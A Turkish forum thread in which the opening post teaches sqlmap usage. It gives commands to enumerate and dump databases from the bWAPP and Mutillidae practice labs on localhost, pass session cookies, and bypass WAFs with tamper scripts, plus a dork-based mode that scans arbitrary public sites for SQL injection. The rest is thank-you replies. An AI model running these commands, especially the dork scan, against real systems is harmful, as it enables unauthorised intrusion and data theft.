![]() |
Linux SqlMap Kullanımı. [Üye Olmadan Linkleri Göremezsiniz. Lütfen Üye Olmak için TIKLAYIN...] Sqlmap sql injection açıkları için geliştirilmiş çok ileri seviye bir araçtır. Python diliyle yazılmıştır. Sqlmap başlı başına ayrı bir kitap konusu bu yüzden biz genel olarak basit bir şekilde kullanımını ve bir kaç modülünü göreceğiz. Sqlmap, sqlmap [parametreler] şeklinde kullanılır. Bilgi ve yardım için -h parametresini kullanabilirsiniz. İleri düzey parametreler için - hh komutu ile öğrenebilir ve bilgi alabilirsiniz. Komut: Kod: sqlmap -hhTemel olarak tüm bağlantılarda kullanacağımız temel komut aşağıdaki gibidir. Komut: Kod: sqlmap -u “hedefsite.com/index.php?id=” --dbsDork: Alıntı:
Kod: sqlmap -u "inurl:news.php?id="Burada verdiğimiz dork ile tek tek siteleri çekip ve çekilen sitede sql açığı olup olmadığını bizlere soruyor. Eğer hedef bağlantıda sql inj. açığı mevcut değil ise bir sonraki siteye geçer ve her site için kontrol edilip edilmeyeceğini bize sorar. Hedef Site: Alıntı:
Sql injection olan ilk soruyu açtığımızda bir arama formu çıkıp “’” meta karakteri ile hatayı aldık. [Üye Olmadan Linkleri Göremezsiniz. Lütfen Üye Olmak için TIKLAYIN...] şekilde görüldüğü gibi hatamızı aldık. Bunu sqlmap vasıtasıyla verileri çekelim. Sql inj. ile verileri çekmeden önce kurduğumuz sistem kullanıcı girişi yapıldıktan sonra sql inj. tespit edilmiştir. Bundan yola çıkarak sqlmap direk sisteme erişim sağlayamacağı için sqlmap’e cookieleri girmemiz gerekmektedir. Cookieleri çekmek için herhangi bir cookie editör kullanabilirsiniz. [Üye Olmadan Linkleri Göremezsiniz. Lütfen Üye Olmak için TIKLAYIN...] Cookie: Alıntı:
Alıntı:
Komut: Kod: sqlmap -u "http://localhost/lab/bWAPP/sqli_1.php?title=%27a" --cookie='PHPSESSID=cpd3s47416v7j9pd55od17vrf1; security_level=0' --dbsVeritabanını çektik sıra tablolarda –tables parametreleri ile çekilir. Komut: Kod: sqlmap -u "http://localhost/lab/bWAPP/sqli_1.php?title=%27a" --cookie='PHPSESSID=cpd3s47416v7j9pd55od17vrf1; security_level=0' -D bWAPP --tablesbWAPP adlı veritabanındaki tabloları çekmiş olduk. Kolonları çekmek için –columns parametresi kullanılır. Komut: Kod: sqlmap -u "http://localhost/lab/bWAPP/sqli_1.php?title=%27a" --cookie='PHPSESSID=cpd3s47416v7j9pd55od17vrf1; security_level=0' -D bWAPP -T blog --columnsAlıntı:
Komut: Kod: sqlmap -u "http://localhost/lab/bWAPP/sqli_1.php?title=%27a" --cookie='PHPSESSID=cpd3s47416v7j9pd55od17vrf1; security_level=0' -D bWAPP -T blog -C id,date --dumpDosya Yolu: Alıntı:
Hedef sistemde sql injectin varsa bile ve hedef sistemde waf olması durumlarda Waf Bypass scriptleri kullanılmaktadır. Bu scriptlere genel olarak tamper denilmektedir. Tamper scriptleri SqlMap’ın kurulu olduğu dizin altındaki tamper klasöründe bulunmaktadır. Komut: Kod: cd /usr/share/sqlmap/tamperTamper scriptleri python ile yazılmış olup tüm scriptlerin neler yapabileceğini öğrenmek isterseniz biraz programlama dili biliyorsanız scriptleride anlıyabilirsiniz. –tamper parametresi ile kullanılmaktadır. Bir örnek ile gösterecek olursak; Örnek: Kod: sqlmap -u http://localhost/lab/mutillidae/index.php?page=user-info.php&username=%27&password=bug&user-info-php-submit-button=View+Account+Details --dbs --tamper=space2commentKaynak: Kali Linux Sayfa 142 |
okuyup okuyup hicbir sey anlamiyorum resmen bu islerle ilgilenenlere helal olsun :gulmektencatlayan: paylasim icin tesekkürler emegine saglik |
Emeğine sağlık @[Üye Olmadan Linkleri Göremezsiniz. Lütfen Üye Olmak için TIKLAYIN...] |
Emeğinize sağlık |
Emeğine sağlık teşekkür ederiz konu için. |
| Tüm Zamanlar GMT +3 Olarak Ayarlanmış. Şuanki Zaman: 00:26. |
Powered by vBulletin® Version 3.8.11
Copyright ©2000 - 2025, vBulletin Solutions, Inc.
Copyright ©2019 - 2025 | IRCRehberi.Net